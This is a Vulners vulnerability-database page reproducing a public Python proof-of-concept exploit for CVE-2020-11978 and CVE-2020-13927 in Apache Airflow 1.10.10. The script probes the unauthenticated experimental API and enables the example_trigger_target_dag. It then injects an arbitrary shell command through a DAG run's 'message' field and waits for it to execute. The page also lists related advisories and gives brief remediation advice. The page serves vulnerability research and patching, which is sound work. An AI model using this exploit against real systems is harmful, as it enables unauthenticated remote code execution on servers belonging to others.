Vulners
Lucene search
Apache Airflow 1.10.10 Remote Code Execution
| Reporter | Title | Published | Views | Family All 59 |
|---|---|---|---|---|
 | Apache Airflow 1.10.10 - (Example Dag) Remote Code Execution Exploit | 2 Jun 202100:00 | – | zdt |
| Apache Airflow 1.10.10 Remote Code Execution Exploit | 19 Sep 202300:00 | – | zdt |
 | Exploit for OS Command Injection in Apache Airflow | 6 Sep 202512:42 | – | gitee |
 | Exploit for OS Command Injection in Apache Airflow | 22 May 202115:58 | – | githubexploit |
 | CVE-2020-13927 | 10 Nov 202000:00 | – | attackerkb |
| CVE-2020-11978 | 17 Jul 202000:00 | – | attackerkb |
 | Apache Airflow < 1.10.11 Multiple Vulnerabilities | 13 Jun 202200:00 | – | nessus |
 | CVE-2020-11978 | 3 Jun 202100:39 | – | circl |
| CVE-2020-13927 | 10 Nov 202018:27 | – | circl |
 | Apache Airflow Command Injection | 18 Jan 202200:00 | – | cisa_kev |
10
`# Exploit Title: Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution
# Date: 2021-06-02
# Exploit Author: Pepe Berba
# Vendor Homepage: https://airflow.apache.org/
# Software Link: https://airflow.apache.org/docs/apache-airflow/stable/installation.html
# Version: <= 1.10.10
# Tested on: Docker apache/airflow:1.10 .10 (https://github.com/pberba/CVE-2020-11978/blob/main/docker-compose.yml)
# CVE : CVE-2020-11978
#
# This is a proof of concept for CVE-2020-11978, a RCE vulnerability in one of the example DAGs shipped with airflow
# This combines with CVE-2020-13927 where unauthenticated requests to Airflow's Experimental API were allowded by default.
# Together, potentially allows unauthenticated RCE to Airflow
#
# Repo: https://github.com/pberba/CVE-2020-11978
# More information can be found here:
# https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E
# https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E
#
# Remediation:
# For CVE-2020-13927 make sure that the config `[api]auth_backend = airflow.api.auth.backend.deny_all` or has auth set.
# For CVE-2020-11978 use 1.10.11 or set `load_examples=False` when initializing Airflow. You can also manually delete example_trigger_target_dag DAG.
#
# Example usage: python CVE-2020-11978.py http://127.0.0.1:8080 "touch test"
import argparse
import requests
import sys
import time
def create_dag(url, cmd):
print('[+] Checking if Airflow Experimental REST API is accessible...')
check = requests.get('{}/api/experimental/test'.format(url))
if check.status_code == 200:
print('[+] /api/experimental/test returned 200' )
else:
print('[!] /api/experimental/test returned {}'.format(check.status_code))
print('[!] Airflow Experimental REST API not be accessible')
sys.exit(1)
check_task = requests.get('{}/api/experimental/dags/example_trigger_target_dag/tasks/bash_task'.format(url))
if check_task.status_code != 200:
print('[!] Failed to find the example_trigger_target_dag.bash_task')
print('[!] Host isn\'t vunerable to CVE-2020-11978')
sys.exit(1)
elif 'dag_run' in check_task.json()['env']:
print('[!] example_trigger_target_dag.bash_task is patched')
print('[!] Host isn\'t vunerable to CVE-2020-11978')
sys.exit(1)
print('[+] example_trigger_target_dag.bash_task is vulnerable')
unpause = requests.get('{}/api/experimental/dags/example_trigger_target_dag/paused/false'.format(url))
if unpause.status_code != 200:
print('[!] Unable to enable example_trigger_target_dag. Example dags were not loaded')
sys.exit(1)
else:
print('[+] example_trigger_target_dag was enabled')
print('[+] Creating new DAG...')
res = requests.post(
'{}/api/experimental/dags/example_trigger_target_dag/dag_runs'.format(url),
json={
'conf': {
'message': '"; {} #'.format(cmd)
}
}
)
if res.status_code == 200:
print('[+] Successfully created DAG')
print('[+] "{}"'.format(res.json()['message']))
else:
print('[!] Failed to create DAG')
sys.exit(1)
wait_url = '{url}/api/experimental/dags/example_trigger_target_dag/dag_runs/{execution_date}/tasks/bash_task'.format(
url = url,
execution_date=res.json()['execution_date']
)
start_time = time.time()
print('[.] Waiting for the scheduler to run the DAG... This might take a minute.')
print('[.] If the bash task is never queued, then the scheduler might not be running.')
while True:
time.sleep(10)
res = requests.get(wait_url)
status = res.json()['state']
if status == 'queued':
print('[.] Bash task queued...')
elif status == 'running':
print('[+] Bash task running...')
elif status == 'success':
print('[+] Bash task successfully ran')
break
elif status == 'None':
print('[-] Bash task is not yet queued...'.format(status))
else:
print('[!] Bash task was {}'.format(status))
sys.exit(1)
return 0
def main():
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('url', type=str, help="Base URL for Airflow")
arg_parser.add_argument('command', type=str)
args = arg_parser.parse_args()
create_dag(
args.url,
args.command
)
if __name__ == '__main__':
main()
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Jun 2021 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.94272